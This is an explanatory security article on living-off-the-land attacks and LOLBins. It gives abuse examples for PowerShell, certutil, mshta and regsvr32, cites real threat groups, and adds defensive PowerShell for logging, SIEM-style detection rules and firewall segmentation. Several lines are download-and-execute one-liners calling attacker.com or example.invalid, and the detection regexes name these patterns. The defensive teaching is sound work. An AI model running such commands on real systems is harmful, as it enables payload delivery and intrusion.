
Living off the Land Attacks and LOLBins Explained

Living off the land attacks abuse legitimate system tools to evade detection. Learn what LOLBins are, how attackers use them, and how to defend against them.


Attackers have learned that carrying their own weapons into a target environment is risky — custom malware gets detected, signatures get written, files get flagged. So instead, they use the tools already present on the system. This strategy is called Living off the Land (LotL), and the legitimate system binaries they abuse are known as LOLBins — Living off the Land Binaries.

The result is attacks that blend into normal system activity, leave minimal forensic traces, and often defeat traditional signature-based antivirus entirely.

What Are LOLBins?

LOLBins are legitimate, often Microsoft-signed executables that ship with Windows (or Linux/macOS) and can be abused to perform malicious actions. These binaries are trusted by the operating system, whitelisted by many security tools, and generate logs that look like normal administrative activity.

The LOLBAS project (lolbas-project.github.io) catalogs hundreds of such binaries. Each entry documents what the binary can do legitimately and how it can be abused for:

  • Code execution — running attacker-supplied code
  • Download — fetching payloads from the internet
  • Bypass — circumventing security controls
  • Persistence — maintaining access after reboots
  • Lateral movement — spreading across the network

Most Abused LOLBins

PowerShell

PowerShell is the most heavily abused LotL tool in Windows environments. It provides a full scripting environment with direct access to .NET APIs, WMI, the Windows registry, COM objects, and network functions. Attackers use it to:

  • Download and execute malware in memory without touching disk
  • Encode commands in Base64 to evade string-based detection
  • Enumerate Active Directory for lateral movement targets
  • Establish reverse shells

Example abuse: powershell -enc [Base64-encoded-payload] — the -enc flag accepts a command encoded as Base64 (of its UTF-16LE bytes), so the plaintext command never appears on the command line where string-based detection would see it.

certutil.exe

certutil is a Windows certificate management utility. But it can also download files from the internet and decode Base64 — making it a popular downloader for malware payloads.

certutil -urlcache -split -f http://attacker.com/payload.exe payload.exe

This command downloads a file from an attacker’s server. Because certutil is a signed Microsoft binary used legitimately in enterprise environments, it was historically overlooked by many security tools.

mshta.exe

mshta (Microsoft HTML Application Host) runs HTA files — HTML applications with access to Windows scripting. Attackers use it to execute VBScript or JScript payloads directly from URLs:

mshta http://attacker.com/payload.hta

This technique has been used extensively by groups like APT32 (OceanLotus) and FIN7.

wmic.exe (Windows Management Instrumentation)

WMIC allows querying and controlling Windows systems. Attackers use it for lateral movement (executing commands on remote machines), process creation, and persistence.

regsvr32.exe (Squiblydoo)

regsvr32 registers COM components. The “Squiblydoo” technique uses it to download and execute a remote scriptlet, bypassing application whitelisting:

regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll

This technique was used in real attacks and prompted Microsoft to eventually address it in later Windows versions.

bitsadmin.exe

BITS (Background Intelligent Transfer Service) is used for Windows Update transfers. Attackers use bitsadmin to schedule downloads that persist through reboots and blend with legitimate update traffic.

Other Notable LOLBins

Binary                      Abuse Type
wscript.exe / cscript.exe   Script execution (VBScript, JScript)
rundll32.exe                Execute DLL functions directly
msiexec.exe                 Install remote MSI packages
forfiles.exe                Execute commands for each file found
odbcconf.exe                Load and execute DLLs via ODBC config
installutil.exe             Execute .NET assemblies, bypassing AppLocker
cmstp.exe                   Bypass UAC and execute remote scripts

Real-World LotL Attack Examples

APT29 / Cozy Bear

The Russian SVR-linked group APT29 is well-documented for LotL techniques. In the SolarWinds supply chain attack and subsequent intrusions, they used PowerShell, WMI, and legitimate cloud services (Microsoft Graph API, Dropbox, Google Drive) as command-and-control channels to blend in with normal business traffic.

FIN7

The financially motivated FIN7 group used PowerShell extensively alongside legitimate tools like Meterpreter (a penetration testing payload) to move laterally through retail and hospitality networks, exfiltrating payment card data over months-long dwell times.

Hafnium (Exchange Server Attacks)

After exploiting ProxyLogon vulnerabilities in Microsoft Exchange, the Chinese-linked Hafnium group used built-in Windows tools including PowerShell and certutil to deploy webshells and exfiltrate data, minimizing their use of custom malware.

Scattered Spider

The Scattered Spider (UNC3944) group, responsible for high-profile casino breaches in 2023, used legitimate remote management tools (AnyDesk, TeamViewer) alongside PowerShell and Azure Active Directory components to maintain access and move laterally — classic LotL.

Why LotL Is So Effective

Blending in: Logs from legitimate administrative use of these tools look identical to logs from malicious use. A PowerShell command run by an attacker looks the same as one run by a sysadmin.

Trust by default: These binaries are signed by Microsoft and trusted by application whitelisting solutions unless those solutions are carefully configured.

Fileless execution: Many LotL attacks execute entirely in memory, leaving no files on disk for traditional antivirus to scan.

Bypassing traditional AV: Signature-based detection is essentially useless against PowerShell scripts or certutil downloads because the tools themselves are legitimate.

How to Defend Against LotL Attacks

Constrained Language Mode for PowerShell

Enable PowerShell Constrained Language Mode in environments where full PowerShell functionality is not required. Pair with Script Block Logging and Module Logging to capture what PowerShell commands are actually executing.
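As an added example (not from the original article), the PowerShell script below turns on Script Block Logging and Module Logging through the policy registry keys that Group Policy itself writes, then reports the session's language mode. The registry paths are the standard PowerShell policy locations; the helper function name is this example's own. It must run from an elevated prompt, and it only checks Constrained Language Mode, which is enforced through a WDAC or AppLocker policy rather than a registry flag.

```powershell
# Added example: enable PowerShell Script Block and Module Logging via the policy
# registry keys, then report the current language mode. Run elevated.
# Assumption: these are the standard policy paths; confirm against your GPO baseline.

$policyRoot = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

# Helper (this example's own): create the key if needed and write a DWORD value.
function Set-PolicyValue {
    param([string]$KeyPath, [string]$Name, [int]$Value)
    if (-not (Test-Path $KeyPath)) { New-Item -Path $KeyPath -Force | Out-Null }
    New-ItemProperty -Path $KeyPath -Name $Name -Value $Value -PropertyType DWord -Force | Out-Null
}

# Script Block Logging records the de-obfuscated content of every script block
# (Event ID 4104), so a '-enc' payload is logged in clear text once PowerShell decodes it.
Set-PolicyValue "$policyRoot\ScriptBlockLogging" 'EnableScriptBlockLogging' 1

# Module Logging for all modules records pipeline execution details (Event ID 4103).
Set-PolicyValue "$policyRoot\ModuleLogging" 'EnableModuleLogging' 1
$moduleNames = "$policyRoot\ModuleLogging\ModuleNames"
if (-not (Test-Path $moduleNames)) { New-Item -Path $moduleNames -Force | Out-Null }
New-ItemProperty -Path $moduleNames -Name '*' -Value '*' -PropertyType String -Force | Out-Null

# Report the language mode of this session. 'ConstrainedLanguage' is what a WDAC or
# AppLocker policy enforces on untrusted scripts; 'FullLanguage' means unrestricted
# access to .NET, COM and Win32 from the command line.
$mode = $ExecutionContext.SessionState.LanguageMode
"Current PowerShell language mode: $mode"
if ($mode -ne 'ConstrainedLanguage') {
    'Constrained Language Mode is not in effect here; enforce it with a WDAC or AppLocker policy.'
}

# Sanity check: show the most recent script block events, if any have been written yet.
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
    -MaxEvents 5 -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, Id, @{ n = 'ScriptBlock'; e = { $_.Properties[2].Value } }
```

Script block events are what make the -enc indicator actionable: the 4104 event carries the decoded script text, so the SIEM rule that fires on the encoded command line can be paired with the content that actually ran.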

Application Control / Whitelisting

Implement Windows Defender Application Control (WDAC) or AppLocker to restrict which binaries can execute, and more specifically, what those binaries can do. Blocking mshta.exe, certutil downloads, and regsvr32 remote loading removes major attack vectors.

Behavioral Detection (EDR)

Modern Endpoint Detection and Response tools like CrowdStrike Falcon, Microsoft Defender for Endpoint, and SentinelOne use behavioral analytics rather than signatures. They detect patterns like “certutil downloading an executable” or “PowerShell spawning a network connection” even when no malware file exists.

Privileged Access Workstations (PAWs)

Restrict which machines can run powerful tools like PowerShell with full language mode, and limit administrative tool usage to designated workstations.

Monitor for Known LotL Indicators

Use SIEM rules to alert on:

  • PowerShell with -enc or -EncodedCommand flags
  • certutil with URL parameters
  • mshta spawned with HTTP/HTTPS arguments
  • WMIC executing remote process creation
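The following PowerShell script is an added example, not from the original article, that implements the four indicators above (and, going one step further, the regsvr32 remote scriptlet pattern described in the Squiblydoo section) as regular-expression rules and runs them over constructed process-creation events shaped like Sysmon Event ID 1 or Security Event 4688. The event fields, hostnames, user names, URLs and the function name are all assumptions made for this demo; the encoded PowerShell payload is built inside the script from a harmless command so the decode step has realistic input.

```powershell
# Added example: LotL indicator rules run over constructed process-creation events.
# Everything here (events, rule names, Get-LotLAlert) is this example's own, not a product API.

$rules = @(
    @{ Name    = 'PowerShell encoded command'
       # PowerShell accepts any prefix of -EncodedCommand down to -e; group 3 captures the Base64 blob.
       Pattern = '(?i)powershell(\.exe)?.*\s-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})' },
    @{ Name    = 'certutil used as a downloader'
       Pattern = '(?i)certutil(\.exe)?.*(-urlcache|https?://)' },
    @{ Name    = 'mshta executing a remote HTA'
       Pattern = '(?i)mshta(\.exe)?.*https?://' },
    @{ Name    = 'WMIC remote process creation'
       Pattern = '(?i)wmic(\.exe)?.*\s/node:.*process\s+call\s+create' },
    @{ Name    = 'regsvr32 remote scriptlet (Squiblydoo)'
       Pattern = '(?i)regsvr32(\.exe)?.*\s/i:https?://.*scrobj\.dll' }
)

function Get-LotLAlert {
    param([Parameter(Mandatory)][hashtable[]]$Events)
    foreach ($e in $Events) {
        foreach ($r in $rules) {
            if ($e.CommandLine -match $r.Pattern) {
                $alert = [ordered]@{
                    Rule        = $r.Name
                    Computer    = $e.Computer
                    User        = $e.User
                    Parent      = $e.ParentImage
                    CommandLine = $e.CommandLine
                }
                # For encoded PowerShell, decode the UTF-16LE Base64 so the analyst sees the real command.
                if ($r.Name -like 'PowerShell*') {
                    try {
                        $alert['Decoded'] = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[3]))
                    } catch { $alert['Decoded'] = '<not valid Base64>' }
                }
                [pscustomobject]$alert
            }
        }
    }
}

# Constructed sample events. The encoded payload is generated from a harmless command.
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Get-Process | Out-Null'))
$sampleEvents = @(
    @{ Computer = 'WS01'; User = 'CORP\jdoe'; ParentImage = 'C:\Windows\System32\cmd.exe'
       CommandLine = "powershell.exe -nop -w hidden -enc $encoded" },
    @{ Computer = 'WS01'; User = 'CORP\jdoe'; ParentImage = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'certutil.exe -urlcache -split -f http://example.invalid/payload.exe payload.exe' },
    @{ Computer = 'WS02'; User = 'CORP\svc-helpdesk'; ParentImage = 'C:\Windows\explorer.exe'
       CommandLine = 'mshta.exe http://example.invalid/update.hta' },
    @{ Computer = 'WS02'; User = 'CORP\admin'; ParentImage = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'wmic.exe /node:FS01 process call create "cmd.exe /c whoami"' },
    @{ Computer = 'WS03'; User = 'CORP\admin'; ParentImage = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll' },
    # Benign administrative uses that must not alert:
    @{ Computer = 'WS03'; User = 'CORP\admin'; ParentImage = 'C:\Windows\System32\cmd.exe'
       CommandLine = 'certutil.exe -verify server.cer' },
    @{ Computer = 'WS03'; User = 'CORP\admin'; ParentImage = 'C:\Windows\explorer.exe'
       CommandLine = 'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1' }
)

# Five alerts are expected; the two benign events fall through untouched.
Get-LotLAlert -Events $sampleEvents | Format-List
```

Anchoring each pattern to the binary name plus its abuse-specific argument (the URL for certutil and mshta, /node: with process call create for WMIC, the /i:http scriptlet for regsvr32) is what keeps the benign certutil -verify and the script-file PowerShell run from firing; the parent process and user fields are carried into the alert because that context is usually what separates an administrator's scheduled job from an attacker's cmd.exe-spawned chain.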

Network Segmentation

Even if an attacker abuses LotL tools to move laterally, proper network segmentation limits how far they can go. Blocking unnecessary SMB, WMI, and RDP access between workstations significantly reduces the blast radius.
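As an added example (not from the original article), the following PowerShell applies host-based segmentation on a workstation image with Windows Defender Firewall, blocking inbound SMB, RDP and WMI from the peer workstation subnet while leaving servers in other address ranges reachable. The subnet, rule names and group label are placeholder assumptions; the cmdlets are the standard NetSecurity module ones, and the script must run elevated.

```powershell
# Added example: block workstation-to-workstation SMB, RDP and WMI with Windows Firewall.
# Assumptions: peer workstations live in $workstationSubnet; management servers are elsewhere.
# Windows Firewall gives Block rules precedence over Allow, so the Block rules are scoped
# to the workstation subnet rather than blocking all sources and then allowing exceptions.

$workstationSubnet = '10.20.0.0/16'                       # assumption: workstation VLAN
$group             = 'LotL lateral-movement containment'  # label used to find the rules later

$blocks = @(
    @{ Name = 'Block inbound SMB from workstations';                 Protocol = 'TCP'; Port = 445  },
    @{ Name = 'Block inbound RDP from workstations';                 Protocol = 'TCP'; Port = 3389 },
    @{ Name = 'Block inbound RPC endpoint mapper from workstations'; Protocol = 'TCP'; Port = 135  }
)

foreach ($b in $blocks) {
    New-NetFirewallRule -DisplayName $b.Name -Group $group -Direction Inbound `
        -Protocol $b.Protocol -LocalPort $b.Port -RemoteAddress $workstationSubnet `
        -Action Block -Profile Domain -Enabled True | Out-Null
}

# WMI rides on DCOM: port 135 plus a dynamic RPC port, so also block the WMI
# service itself from workstation sources rather than guessing the dynamic port.
New-NetFirewallRule -DisplayName 'Block inbound WMI from workstations' -Group $group `
    -Direction Inbound -Service Winmgmt -RemoteAddress $workstationSubnet `
    -Action Block -Profile Domain -Enabled True | Out-Null

# Verify what was created.
Get-NetFirewallRule -Group $group | Select-Object DisplayName, Enabled, Action
```

Scoping the Block rules by source address is the important design choice: a PAW or patch server in a separate range can still reach the workstation over these protocols, while a compromised peer workstation using wmic /node: or an SMB admin share cannot.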

The Bottom Line

Living off the land attacks exploit a fundamental tension in endpoint security: the tools administrators need to do their jobs are the same tools attackers use to compromise systems. Effective defense requires behavioral monitoring, not just signature blocking — watching what tools do, not just which tools run. In environments where SOC visibility is strong and EDR coverage is complete, LotL attacks become significantly harder to sustain silently.
